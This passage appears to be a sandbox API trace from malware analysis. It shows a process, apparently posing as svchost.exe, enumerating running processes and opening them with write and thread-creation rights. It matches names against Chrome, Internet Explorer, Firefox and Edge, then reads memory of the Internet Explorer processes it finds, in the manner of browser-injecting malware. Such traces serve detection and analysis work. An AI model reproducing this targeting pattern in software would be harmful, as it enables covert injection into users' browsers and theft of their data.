	[0229.707] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x65f8
	[0229.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.707] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0229.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.708] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.708] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0229.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.709] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.709] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0229.710] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x65fc
	[0229.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.710] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0229.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.711] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.711] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0229.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.712] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.713] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0229.713] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x6600
	[0229.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.714] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0229.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.714] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.714] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0229.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.714] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.715] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0229.715] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x6604
	[0229.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.715] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0229.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.716] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.716] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0229.717] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.717] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.717] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0229.718] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x6608
	[0229.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.718] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0229.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.719] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.719] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0229.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.720] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.720] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0229.721] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x660c
	[0229.721] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.721] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0229.721] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.721] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.722] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0229.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.722] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.722] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0229.723] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x6610
	[0229.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.723] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0229.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.723] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.724] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0229.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.724] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.724] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0229.725] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x6614
	[0229.725] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.725] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0229.725] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.725] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.727] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0229.727] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.727] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.728] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0229.728] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x6618
	[0229.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.728] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0229.729] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.729] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.730] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0229.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.731] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.731] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0229.732] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x661c
	[0229.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.732] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0229.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.732] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.733] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0229.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.733] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.734] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0229.735] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x6620
	[0229.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.735] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0229.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.735] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.736] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.736] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0229.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.737] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.737] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0229.738] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x6624
	[0229.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.738] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0229.739] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.739] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.739] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.739] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0229.740] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.740] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.740] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0229.741] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x6628
	[0229.741] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.741] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0229.742] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.742] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0229.742] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.742] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0229.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.743] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.743] NtQueryInformationProcess (in: ProcessHandle=0x6628, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0229.743] ReadProcessMemory (in: hProcess=0x6628, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0229.743] ReadProcessMemory (in: hProcess=0x6628, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0229.743] ReadProcessMemory (in: hProcess=0x6628, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0229.743] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0229.744] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0229.744] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x662c
	[0229.744] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.744] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0229.745] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.745] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0229.745] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.745] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0229.745] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.745] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.746] NtQueryInformationProcess (in: ProcessHandle=0x662c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0229.746] ReadProcessMemory (in: hProcess=0x662c, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0229.746] ReadProcessMemory (in: hProcess=0x662c, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0229.746] ReadProcessMemory (in: hProcess=0x662c, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0229.746] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0229.746] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0229.747] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x6630
	[0229.747] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.747] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0229.747] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.747] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.748] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0229.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.748] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.748] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0229.749] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x6634
	[0229.749] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.749] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0229.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.750] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.750] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0229.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.751] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.751] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0229.751] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x6638
	[0229.752] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.752] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0229.752] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.752] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.752] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.752] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0229.753] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.753] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.753] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0229.754] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0229.754] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x663c
	[0229.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.755] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0229.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.755] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.755] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0229.756] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.756] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.756] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0229.757] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x6640
	[0229.757] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.757] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0229.757] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.757] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.758] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0229.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.758] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.759] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0229.759] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x6644
	[0229.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.760] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0229.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.760] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.760] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0229.761] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.761] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.761] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0229.762] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa80) returned 0x6648
	[0229.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.762] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0229.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.762] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.762] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0229.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.763] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.763] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0229.764] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x664c
	[0229.764] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.764] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0229.764] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.764] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.765] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.765] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0229.765] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.765] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.765] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0229.766] CloseHandle (hObject=0x4fd0) returned 1
	[0229.766] Sleep (dwMilliseconds=0x64) 
	[0229.898] GetCurrentProcessId () returned 0x110
	[0229.898] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
